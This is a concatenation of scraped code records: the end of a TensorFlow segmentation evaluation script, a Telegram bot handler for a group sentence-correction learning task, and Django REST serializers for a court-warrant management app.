model.net_class.deconv_logits.shape)\n predictions = model.get_predictions()\n print('prediction shape', predictions.shape)\n\n cross_entropy_loss = model.loss(labels)\n\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\n timestamp = utils.get_timestamp()\n evaluation_result_path = _RESULT_PATH + '_evaluation_raw_' + '%s' % timestamp + \"_batch_\" + str(\n batch_size) + \"_ckpt_\" + str(load_from_chkpt.split('/')[-1].split('.')[0]) + \"/\"\n if not os.path.exists(evaluation_result_path):\n os.makedirs(evaluation_result_path)\n test_details_file_path = evaluation_result_path + \"test_details.txt\"\n utils.print_test_details(batch_size, num_epochs, None, load_from_chkpt,\n test_details_file_path)\n metrics_file_path = evaluation_result_path + \"test_metrics.txt\"\n image_result_part_path = evaluation_result_path + \"test_image_\"\n pred_result_part_path = evaluation_result_path + \"human_0_rgb_\"\n loss_path = evaluation_result_path + \"loss.png\"\n with tf.Session() as sess:\n sess.run(init_op)\n step = 0\n step_vector = []\n loss_vector = []\n acc_vector = []\n TP_sum = np.zeros((10,))\n TN_sum = np.zeros((10,))\n FP_sum = np.zeros((10,))\n FN_sum = np.zeros((10,))\n\n if load_from_chkpt:\n utils.load_checkpoint(sess, load_from_chkpt)\n else:\n print('Error! Pass a checkpoint to load')\n return\n\n start_time = time.time()\n try:\n #while not coord.should_stop():\n dataset.initialize_epoch_for_raw_data(permutate=False)\n loopsize = math.floor(dataset.total_samples/batch_size)\n for iter in range(loopsize):\n # Run one step of the model. The return values are\n # the activations from the `train_op` (which is\n # discarded) and the `loss` op. 
To inspect the values\n # of your ops or variables, you may include them in\n # the list passed to sess.run() and the value tensors\n # will be returned in the tuple from the call.\n depths_data, labels_data = dataset.get_batch_from_raw_data(batch_size, convert2tensor=False)\n #depths_data = np.repeat(depths_data, 144, axis=0)\n #labels_data = np.repeat(labels_data, 144, axis=0)\n # print('shape depth: ', depths_data.shape, ' shape labels: ', labels_data.shape)\n loss, pred, corr_depth, corr_label = sess.run(\n [cross_entropy_loss, predictions, depths, labels], feed_dict={depths: depths_data, labels: labels_data})\n\n loss_value = np.mean(loss)\n\n # pred = sess.run(model.get_predictions())\n # last_label = sess.run(labels)\n\n # print('pred shape: ', pred.shape)\n # print('last label shape: ', last_label.shape)\n\n\n # Print an overview fairly often.\n if step % save_prediction_interval == 0:\n TP, TN, FP, FN = utils.get_confusion_matrix(pred, corr_label)\n TP_sum += TP\n TN_sum += TN\n FP_sum += FP\n FN_sum += FN\n acc = utils.accuracy_per_pixel(pred, corr_label)\n utils.print_metrics(loss=loss_value,accuracy=acc,step=step,metrics_file_path=metrics_file_path)\n step_vector.append(step)\n loss_vector.append(loss_value)\n #utils.visualize_predictions(pred[0],np.squeeze(corr_label[0]),np.squeeze(corr_depth[0]),path = image_result_part_path + str(step) + '.png')\n utils.save_predictions(pred[0], np.squeeze(corr_depth[0]),\n path=pred_result_part_path + str(step) + '.png', interpolation = 'bilinear')\n\n step += 1\n print('step: ',step)\n\n except tf.errors.OutOfRangeError:\n print('Done training for %d epochs, %d steps.' % (1, step))\n finally:\n end_time = time.time()\n print('Time taken for training: ', end_time - start_time)\n\n # Get IOU over complete data\n IOU = np.mean(TP_sum / (TP_sum + FP_sum + FN_sum + _TINY))\n metrics_file = open(metrics_file_path, 'a+')\n print('IOU OVER COMPLETE EVALUATION DATA: ' + str(IOU), file=metrics_file)\n metrics_file.close()\n\n utils.plot_loss(step_vector, loss_vector, loss_path, 'test')\n\nif __name__ == '__main__':\n # dataset = DataSet(num_poses=53, num_angles=360, max_records_in_tfrec_file=3600, val_fraction=0.01,\n # test_fraction=0.01)\n #dataset = DataSet(num_poses=1, num_angles=360, max_records_in_tfrec_file=360, val_fraction=0.1, test_fraction=0.1)\n\n #chkpt = _CHKPT_PATH + '2017_09_25_06_36_checkpoint-1.ckpt'\n\n #dir_raw_record = _DATA_PATH + 'raw_data_single_model_by_4'\n #dir_raw_record = '/home/neha/segmentation/' + 'data/blender_data/render_data'\n #dir_raw_record = '/home/neha/segmentation/' + 'data/blender_data/render_data_test'\n #dir_raw_record = _DATA_PATH + 'raw_data_single_model'\n\n #dir_raw_record = '/home/neha/Documents/data/blender_data/render_data_3000_1_pose_by_4'\n #dir_raw_record = '/home/neha/Documents/data/blender_data/render_data'\n\n dir_raw_record = '/media/neha/ubuntu/data/segmentation/render_data_corrected_TWO'\n\n batch_size = 2\n num_epochs = 1\n save_prediction_interval = 1\n #load_from_chkpt = _CHKPT_PATH + 'REMOTE_2018_03_31_23_58_checkpoint-1.ckpt'\n #load_from_chkpt = _CHKPT_PATH + '2018_04_05_08_53_checkpoint-1.ckpt'\n #load_from_chkpt = _CHKPT_PATH + 'REMOTE_b_50_md_1_total_300_2018_05_03_11_52_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_09_24_checkpoint-1.ckpt' #batch_of_100_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_11_52_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + 
'2018_05_03_16_26_checkpoint-1.ckpt' #batch_of_10_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_22_56_checkpoint-1.ckpt' #batch_of_50_multi-deconv=2, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_05_14_05_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1, pairs =600\n\n # load_from_chkpt = _CHKPT_PATH + 'REMOTE_b_50_md_1_total_300_2018_05_03_11_52_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1\n # load_from_chkpt = _CHKPT_PATH + '2018_05_16_07_55_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected, 300, REMOTE\n # load_from_chkpt = _CHKPT_PATH + '2018_05_17_08_46_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected, 300, standardized, REMOTE\n load_from_chkpt = _CHKPT_PATH + '2018_05_20_10_24_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected_TWO - changed scale and positions to match kinect v1 domain, 300, REMOTE\n\n\n if not load_from_chkpt:\n print('You must provide a checkpoint to evaluate data')\n exit()\n\n multi_deconv, conv_def_num, mob_depth_multiplier, data_dims_from_ckpt, follow_up_convs, sep_convs, depthsep_inter_norm_activn = utils.get_model_details_from_chkpt_path(\n load_from_chkpt)\n conv_defs = _CONV_DEFS[conv_def_num]\n\n eval(dir_raw_record=dir_raw_record,\n batch_size=batch_size,\n num_epochs=num_epochs,\n data_dims_from_ckpt = data_dims_from_ckpt,\n save_prediction_interval=save_prediction_interval,\n load_from_chkpt=load_from_chkpt,\n multi_deconv=multi_deconv,\n conv_defs=conv_defs,\n mob_depth_multiplier=mob_depth_multiplier,\n follow_up_convs = follow_up_convs,\n sep_convs = sep_convs,\n depthsep_inter_norm_activn = depthsep_inter_norm_activn)\n","repo_name":"neha191091/human-segmentation","sub_path":"segmentation_python/evaluation_raw_data.py","file_name":"evaluation_raw_data.py","file_ext":"py","file_size_in_byte":10655,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"30548302226","text":"from telegram import (Update, ReplyKeyboardMarkup, ReplyKeyboardRemove)\nfrom telegram.ext import (\n CommandHandler, MessageHandler, Filters, ConversationHandler,\n CallbackContext)\nimport logging\nimport json\n\nfrom ..room_handler import end_task_group, get_room_manager_of_group, remove_room_manager_of_group\nfrom .. 
import state\nfrom ....backend.tasks.sentence_correction_storage import get_sentence_correction_task_of_group, remove_sentence_correction_task_of_group\nfrom ...util import get_gif_link, get_group_chat_id, send_animation, send_message, create_keyboard_markup\nfrom ....backend.db.task import insert_sentence_correction_adaptive_data_entry\n\n\nlogger = logging.getLogger(__name__)\n\n\nremove_keyboard_markup = ReplyKeyboardRemove()\nkeyboard_bool = create_keyboard_markup(['Correct', 'Incorrect'])\n\n\ndef task_selection(update: Update, context: CallbackContext):\n \"\"\"\n Evaluates task selection messages.\n If the sentence correction-task was requested by the right user,\n show the task-description, otherwise return to the task selection\n \"\"\"\n # Get room manager\n group_room_manager = get_room_manager_of_group(get_group_chat_id(update))\n # Get selected user who has to chose the task\n selected_usr = group_room_manager.get_selected_user()\n # Check if the message is from the selected user\n if update.message.from_user.username == selected_usr:\n # Set task in room manager\n group_room_manager.next_task(\"sentence correction\")\n return show_sentence_task_description(update, context)\n else:\n # Wait for message from the correct user -> go back to task selection\n return state.SEN_CORR_SEL_WRONG_USER\n\n\ndef show_sentence_task_description(update: Update, context: CallbackContext):\n group_chat_id = get_group_chat_id(update)\n sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n send_message(sentence_task.get_task_instructions(),\n update, context, text_markup=True)\n\n gif_url = get_gif_link(\"fix_it\")\n send_animation(gif_url, update, context)\n\n return present_first_task_iteration(update, context)\n\n\ndef send_sentence(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Send sentence to all students and add custom response keyboard for selected user\n send_message(sentence_task.get_sentence_msg() + \"\\n\" + sentence_task.get_user_selected_msg(),\n update, context, reply_markup=keyboard_bool, text_markup=True)\n\n\ndef present_first_task_iteration(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log info about proficiency\n logger.info('Test information: Start of sentence correction task')\n sentence_task.log_proficiencies()\n # Initialize iteration\n sentence_task.next_group_iteration()\n # Send info about first iteration\n send_message(sentence_task.get_first_iteration_info_msg(), update, context)\n # Randomly select a user\n sentence_task.select_next_user()\n # Send sentence to all students\n send_sentence(update, context)\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n\ndef present_next_task_iteration(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # Get adaptive data.\n sentence_adaptive_data_entry = sentence_task.get_adaptive_data_entry(\n get_group_chat_id(\n update))\n # Insert db entry.\n insert_sentence_correction_adaptive_data_entry(sentence_adaptive_data_entry)\n\n # Check if group iteration is finished\n if sentence_task.is_group_iteration_finished():\n # Check if all responses were correct:\n if sentence_task.is_correct_group_iteration():\n # Combine positive feedback and code + Recap of current codeword\n send_message(\n sentence_task.get_correct_group_iter_feedback() + \"\\n\" +\n 
sentence_task.get_codeword_recap(),\n update, context)\n # Increment counter\n sentence_task.increment_correct_group_iteration()\n\n else:\n # Feedback\n send_message(\n sentence_task.get_incorrect_group_iter_feedback(),\n update, context)\n # Increment counter\n sentence_task.increment_incorrect_group_iteration()\n\n # Reset everything in the iteration over the group\n sentence_task.next_group_iteration()\n\n # Check if task is finished\n if sentence_task.is_finished():\n # Get room manager for global tracking of repeatability\n group_room_manager = get_room_manager_of_group(\n get_group_chat_id(update))\n # increment repetitions counter\n group_room_manager.increment_task_rep_count(\"sentence correction\")\n # check if task can be repeated, i.e. check if the task repetition counter is less than 2\n if not sentence_task.is_success():\n if group_room_manager._reps_counter[\"sentence correction\"] < 2:\n # add task back to list of available tasks\n group_room_manager.repeat_current_task(\"sentence correction\")\n # End the task and go back to room manager\n return end_task(\n update, context, success=sentence_task.is_success(),\n codeword=sentence_task.get_codeword())\n # Log info about proficiency\n else:\n logger.info('Test information: Next sentence')\n sentence_task.log_proficiencies()\n # Send info about next iteration\n update.message.reply_text(\n text=sentence_task.get_next_iteration_info_msg(),\n quote=False)\n # Randomly select a user\n sentence_task.select_next_user()\n send_sentence(update, context)\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n\ndef task_response_correct(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # User says sentence was correct via the reply keyboard\n return _task_response(update, context, True)\n\n\ndef task_response_incorrect(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # User says sentence was incorrect via the reply keyboard\n return _task_response(update, context, False)\n\n\ndef _task_response(update: Update, context: CallbackContext, response: bool):\n\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Get the truth about the sentence\n truth_answer = sentence_task.get_current_sentence_truth()\n # Different cases according to task flow\n\n if truth_answer == True and response == True:\n\n # Log user answer\n logger.info('Test information: User response = {}'.format(\n \"Sentence is correct\"))\n\n # Correct sentence and answer also correct -> Go to next user\n sentence_task.increment_correct_count()\n send_message(sentence_task.get_correct_response_feedback(),\n update, context, reply_markup=remove_keyboard_markup)\n\n # Update proficiencies and go to next task\n sentence_task.update_proficiencies(correct=True)\n 
return present_next_task_iteration(update, context)\n\n    if truth_answer == True and response == False:\n        # Log user answer\n        logger.info(\n            'Test information: User response = {}'.format(\n                \"Sentence is incorrect\"))\n        # Correct sentence but incorrect answer\n        send_message(sentence_task.get_feedback_no_error(), update,\n                     context, reply_markup=remove_keyboard_markup)\n        # Update proficiencies and go to next task\n        sentence_task.update_proficiencies(correct=False)\n        return present_next_task_iteration(update, context)\n\n    if truth_answer == False and response == True:\n\n        # Log user answer\n        logger.info('Test information: User response = {}'.format(\n            \"Sentence is correct\"))\n\n        # Incorrect sentence not identified\n        send_message(sentence_task.get_feedback_missed_error(),\n                     update, context, reply_markup=remove_keyboard_markup)\n\n        sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n        # Adaptability: display appropriate grammar hint\n        send_grammar_feedback(update, context, sentence_sub_types, \"hint\")\n\n        return _identify_sentence_mistake(update, context)\n\n    if truth_answer == False and response == False:\n        # Log user answer\n        logger.info(\n            'Test information: User response = {}'.format(\n                \"Sentence is incorrect\"))\n        # Incorrect sentence correctly identified\n        send_message(sentence_task.get_correct_response_feedback(),\n                     update, context, reply_markup=remove_keyboard_markup)\n        return _identify_sentence_mistake(update, context)\n\n\ndef send_grammar_feedback(\n        update: Update, context: CallbackContext, sentence_sub_types: list,\n        hint_type: str):\n    \"\"\"Send message with a grammar tip that is shown when the user\n    assumes a sentence is correct when it's wrong.\n    Used in Sentence Correction task.\n\n    Args:\n        sentence_sub_types -- sub types as list\n        hint_type -- \"hint\" or \"grammar_rule\" - specifying the output type for the user\n    \"\"\"\n    # Log which sub_type user was not able to identify as wrong\n    logger.info(f\"Wrong sentence of subtype {sentence_sub_types}\"\n                \" marked as correct by user.\")\n\n    # Add the subtype to tracker of already presented grammar rules\n    group_chat_id = get_group_chat_id(update)\n    sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n\n    if hint_type == \"grammar_rule\":\n        sentence_task.grammar_rules_used.append(sentence_sub_types)\n\n    # Retrieve appropriate feedback and send it as Telegram message\n    feedback = get_grammar_tip(sentence_sub_types, hint_type)\n    send_message(feedback, update, context)\n\n    return\n\n\ndef get_grammar_tip(sub_types: list, hint_type: str):\n    \"\"\"Get grammar tip from external text file depending\n    on sub types of sentence. 
Used in Sentence Correction task.\n\n Args:\n sentence_sub_types -- sub types as list\n hint_type -- \"hint\" or \"grammar_rule\" - specifying the output type for the user\n \"\"\"\n\n category = sub_types[0]\n\n # with open('sentence_correction_tips_formating.json') as json_file:\n # grammar_rules = json.load(json_file)\n\n path_to_json = \"data/adaptivity/sentence_correction_tips_formating.json\"\n json_file = open(path_to_json)\n grammar_rules_dict = json.load(json_file)\n\n print(\"Category\", category, \"Value\", category.value)\n print(\"hint type\", hint_type)\n print(type(grammar_rules_dict))\n print(list(grammar_rules_dict.keys()))\n print(\"Number of keys\", len(list(grammar_rules_dict.keys())))\n print(\"category.value Type\", type(category.value))\n print(\"category.value to string\", type(str(category.value)))\n\n return grammar_rules_dict[str(category.value)][hint_type]\n\n\ndef check_selected_user(update):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n return update.message.from_user.username == sentence_task.get_selected_user()\n\n\ndef _identify_sentence_mistake(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log info about asking for identification\n logger.info('Test information: User asked for error identification')\n # Send message to identify the erroneous word\n # Get words as a list\n sentence_words = sentence_task.get_curr_sentence_words()\n # Send message with keyboard markup that contains the words\n send_message(sentence_task.get_identification_msg(),\n update, context,\n reply_markup=create_keyboard_markup(\n options=sentence_words))\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n\ndef evaluate_sentence_mistake_identification(\n update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # Get the text from the message\n response = update.message.text\n # Check if the response is a word in the sentence and go back to waiting for a response\n if not sentence_task.is_response_in_words(response):\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n # Check against truth\n if sentence_task.check_error_identification(response):\n # Positive feedback\n send_message(\n sentence_task.get_feedback_correct_error_identification(),\n update, context, reply_markup=remove_keyboard_markup)\n # Error correction\n return _correct_sentence_mistake(update, context)\n\n else:\n # Inform about mistake\n send_message(\n sentence_task.get_feedback_incorrect_error_identification(),\n update, context, reply_markup=remove_keyboard_markup)\n # Update proficiencies and go to next task\n sentence_task.update_proficiencies(correct=False)\n\n sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n # Adaptability: display appropriate grammar rule\n send_grammar_feedback(\n update, context, sentence_sub_types, \"grammar_rule\")\n\n return _correct_sentence_mistake(update, context)\n\n\ndef _correct_sentence_mistake(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log 
info about asking for correction\n logger.info('Test information: User asked for sentence correction')\n send_message(sentence_task.get_correction_msg(), update, context)\n\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n\ndef get_message_length(msg):\n return len(msg.split(\" \"))\n\n\ndef evaluate_sentence_mistake_correction(\n update: Update, context: CallbackContext):\n\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # Get the message\n response = update.message.text\n\n # Check if message is not longer than one word -> ignore rest\n if not get_message_length(response) == 1:\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n # TODO: Specify when a response from the user is the actual response\n\n # Check response against truth\n if sentence_task.check_error_correction(response):\n\n # Increment number of correct responses\n sentence_task.increment_correct_count()\n\n # Positive feedback\n gif_url = get_gif_link(\"correct\")\n send_animation(gif_url, update, context)\n send_message(\n sentence_task.get_feedback_correct_error_correction(),\n update, context)\n\n # Update proficiencies\n sentence_task.update_proficiencies(correct=True)\n # Go to next task\n return present_next_task_iteration(update, context)\n\n else:\n # Inform about mistake\n msg = sentence_task.get_feedback_incorrect()\n if sentence_task.second_chance:\n msg += sentence_task.get_feedback_error_correction()\n sentence_task.second_chance = False\n send_message(msg, update, context)\n # Update proficiencies and go to next task\n\n sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n # Give a learning opportunity in case the grammar rule has not been presented yet - present the rule and give one more try\n group_chat_id = get_group_chat_id(update)\n sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n\n if sentence_sub_types in sentence_task.grammar_rules_used:\n sentence_task.update_proficiencies(correct=False)\n msg = sentence_task.get_feedback_error_correction()\n send_message(msg, update, context, text_markup=True)\n return present_next_task_iteration(update, context)\n\n else:\n send_grammar_feedback(\n update, context, sentence_sub_types, \"grammar_rule\")\n\n msg = sentence_task.get_try_again_msg(\n sentence_task.curr_sentence.get_str())\n msg += \"\\n\" + sentence_task.get_user_selected_msg()\n send_message(msg, update, context, text_markup=True)\n\n sentence_task.second_chance = True\n\n return _correct_sentence_mistake(update, context)\n\n\ndef end_task(update: Update, context: CallbackContext, success: bool,\n codeword: str):\n # Log info about proficiency\n logger.info('Test information: End of sentence correction task')\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # Get adaptive data.\n sentence_adaptive_data_entry = sentence_task.get_adaptive_data_entry(\n get_group_chat_id(\n update))\n # Insert db entry.\n insert_sentence_correction_adaptive_data_entry(sentence_adaptive_data_entry)\n\n sentence_task.log_proficiencies()\n\n # Send achievement info\n # Inform group\n update.message.reply_text(\n text='Alright, let us check for new achievements ...', quote=False)\n # Get 
all members of the group\n all_students = sentence_task.all_users\n # Boolean to check if new achievements have been completed (default is False)\n new_achievements_completed = False\n # Check and display achievements for each member\n for student in all_students:\n # Update achievements\n new_achievements = student.update_achievements()\n # Inform about new achievements (TODO: Should be done in private chat maybe -> More difficult to implement)\n if len(new_achievements) > 0:\n # New achievements have been completed\n new_achievements_completed = True\n # Create string with achievement descriptions as new lines\n achievement_text = '\\n'.join(map(str, new_achievements))\n # Inform about new achievements\n update.message.reply_text(\n text='Congratulation {}, you earned the following achievements: \\n{}'.\n format(\n student.get_name(),\n achievement_text),\n quote=False)\n # Send goodbye depending on new achievements being completed\n if new_achievements_completed:\n update.message.reply_text(\n text='Those were all new achievements.', quote=False)\n else:\n update.message.reply_text(\n text='I found no new achievements.', quote=False)\n\n remove_sentence_correction_task_of_group(get_group_chat_id(update))\n\n # End the task -> Send dialogue and go to password entering\n return end_task_group(\n update, context, success=success, codeword=codeword,\n state_success=state.SEN_CORR_END_SUCCESS,\n state_fail=state.SEN_CORR_END_FAIL)\n\n\ndef stop_task(update: Update, context: CallbackContext):\n # Log info about proficiency\n logger.info('Test information: End of sentence correction task')\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n sentence_task.log_proficiencies()\n\n # Send achievement info\n # Inform group\n update.message.reply_text(\n text='Alright, let us check for new achievements ...', quote=False)\n # Get all members of the group\n all_students = sentence_task.all_users\n # Boolean to check if new achievements have been completed (default is False)\n new_achievements_completed = False\n # Check and display achievements for each member\n for student in all_students:\n # Update achievements\n new_achievements = student.update_achievements()\n # Inform about new achievements (TODO: Should be done in private chat maybe -> More difficult to implement)\n if len(new_achievements) > 0:\n # New achievements have been completed\n new_achievements_completed = True\n # Create string with achievement descriptions as new lines\n achievement_text = '\\n'.join(map(str, new_achievements))\n # Inform about new achievements\n update.message.reply_text(\n text='Congratulation {}, you earned the following achievements: \\n{}'.\n format(\n student.get_name(),\n achievement_text),\n quote=False)\n # Send goodbye depending on new achievements being completed\n if new_achievements_completed:\n update.message.reply_text(\n text=\"Those were all new achievements.\", quote=False)\n else:\n update.message.reply_text(\n text=\"I found no new achievements.\", quote=False)\n\n remove_sentence_correction_task_of_group(get_group_chat_id(update))\n\n # Remove the room manager\n remove_room_manager_of_group(get_group_chat_id(update))\n # Send goodbye\n update.message.reply_text(\n text='Goodbye. 
To start again write /start.', quote=False)\n\n # Return end state\n return state.SEN_CORR_STOP\n","repo_name":"ALLUOS/ALLUOS_PUBLIC_APP","sub_path":"src/bot/handler/task/sen_corr_handler.py","file_name":"sen_corr_handler.py","file_ext":"py","file_size_in_byte":22711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9626566208","text":"__author__ = 'Dudu'\n\nfrom django.forms import widgets\nfrom rest_framework import serializers\nfrom app.models import Mandado, Oficial, Telefone, Diligencia, Tipo_Diligencia,\\\n Estatus_Cumprimento, Foto, Audio, Vara, Comarca, Ordem, Version\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework_bulk import (\n BulkListSerializer,\n BulkSerializerMixin,\n ListBulkCreateUpdateDestroyAPIView,\n)\n\n\nclass MandadoSerializer(BulkSerializerMixin, serializers.ModelSerializer):\n oficial = serializers.ReadOnlyField(source='oficial.usuario.username')\n\n class Meta:\n model = Mandado\n list_serializer_class = BulkListSerializer\n fields = (\n 'id',\n 'comarca',#\n 'vara',#\n 'processo',#\n 'destinatario',#\n 'cep',#\n 'rua',#\n 'numero',#\n 'bairro',#\n 'cidade',#\n 'estado',#\n 'pais',#\n 'latitude',#\n 'longitude',#\n 'endereco_ERRO',#\n 'verificado_em_loco',#\n 'complemento',#\n 'endereco_nao_mora',#\n 'endereco_ERRO',#\n 'verificado_em_loco',#\n 'complemento',#\n 'ajustado_mapa',#\n 'endereco_nao_mora',#\n 'numero_mandado',#\n 'ano_mandado',#\n 'codigo_mandado',#\n 'data',#\n 'oficial',#\n 'ordem',#\n 'audiencia',#\n 'conducao',#\n 'status_cumprimento',#\n 'cumprimento',#\n 'cor_urgencia',#\n 'rota',#\n 'owner',#\n )\n\n\nclass OficialSerializer(serializers.ModelSerializer):\n mandados = serializers.PrimaryKeyRelatedField(many=True, queryset=Mandado.objects.all())\n class Meta:\n model = Oficial\n fields = (\n 'id',\n 'usuario',\n 'telefone',\n 'email',\n 'cpf',\n 'comarca',\n 'mandados',\n )\n\n'''\nclass CepSerializer(serializers.ModelSerializer):\n class Meta:\n model = CEP\n fields = (\n 'id',\n 'cep',\n 'rua',\n 'bairro',\n 'cidade',\n 'estado',\n 'pais',\n 'latitude',\n 'longitude',\n 'ajustado_mapa'\n )\n\n'''\nclass TelefoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Telefone\n fields = (\n 'id',\n 'ddd',\n 'telefone',\n 'mandado',\n )\n\n'''\nclass EnderecoSerializer(serializers.ModelSerializer):\n cep_str = serializers.CharField(source='cep', read_only=True)\n class Meta:\n model = Endereco\n fields = (\n 'id',\n 'cep',\n 'cep_str',\n 'numero',\n 'latitude',\n 'longitude',\n 'endereco_ERRO',\n 'verificado_em_loco',\n 'complemento',\n )\n'''\n\nclass DiligenciaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Diligencia\n fields = (\n 'id',\n 'mandado',\n 'data_diligencia',\n 'hora_diligencia',\n 'tipo_diligencia',\n 'latitude',\n 'longitude',\n 'data_agendamento',\n 'hora_agendamento',\n 'documento',\n 'editar_documento',\n )\n\n\nclass Tipo_DiligenciaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tipo_Diligencia\n fields = (\n 'id',\n 'nome',\n 'descricao',\n 'modelo_documento',\n 'estatus_cumprimento',\n 'diligencia_positiva',\n 'diligencia_parcial',\n 'diligencia_negativa',\n 'diligencia_nao_cumprida',\n 'diligencia_cumprida',\n 'endereco_ERRO',\n 'diligencia_nao_mora',\n 'verificado_em_loco',\n 'diligencia_externa',\n 'diligencia_coletiva',\n )\n\n\nclass Estatus_CumprimetoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Estatus_Cumprimento\n fields = (\n 'id',\n 'estatus_cumprimento',\n 
'descricao',\n            'exibir_mapa',\n            'cumprimento',\n        )\n\n\nclass OrdemSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Ordem\n        fields = (\n            'id',\n            'ordem',\n            'descricao',\n            'diligencia_positiva',\n        )\n\n\nclass ComarcaSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Comarca\n        fields = (\n            'id',\n            'nome',\n            'cod_comarca',\n            'endereco',\n        )\n\n\nclass VaraSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Vara\n        fields = (\n            'nome',\n            'comarca',\n        )\n\n\nclass FotoSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Foto\n        fields = (\n            'diligencia',\n            'descricao',\n            'foto',\n        )\n\n\nclass AudioSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Audio\n        fields = (\n            'diligencia',\n            'descricao',\n            'audio',\n        )\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n    snippets = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n\n    class Meta:\n        model = User\n        fields = ('id','url', 'username', 'first_name', 'last_name', 'is_staff', 'is_active', 'is_superuser', 'snippets', 'password', 'email')\n\n    def create(self, validated_data):\n        # Set up the desired user configuration here; check the groups section, and always make the user an Oficial\n        user = super(UserSerializer, self).create(validated_data)\n        user.set_password(validated_data['password'])\n        user.is_active = True\n        user.is_staff = True\n        user.is_superuser = False\n        user.groups.set([Group.objects.get(name='Oficial'),])\n\n        user.save()\n        return user\n\nclass VersionSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Version\n        fields = (\n            'id',\n            'versao',\n            'status',\n        )","repo_name":"dududrauto/my-first-blog","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
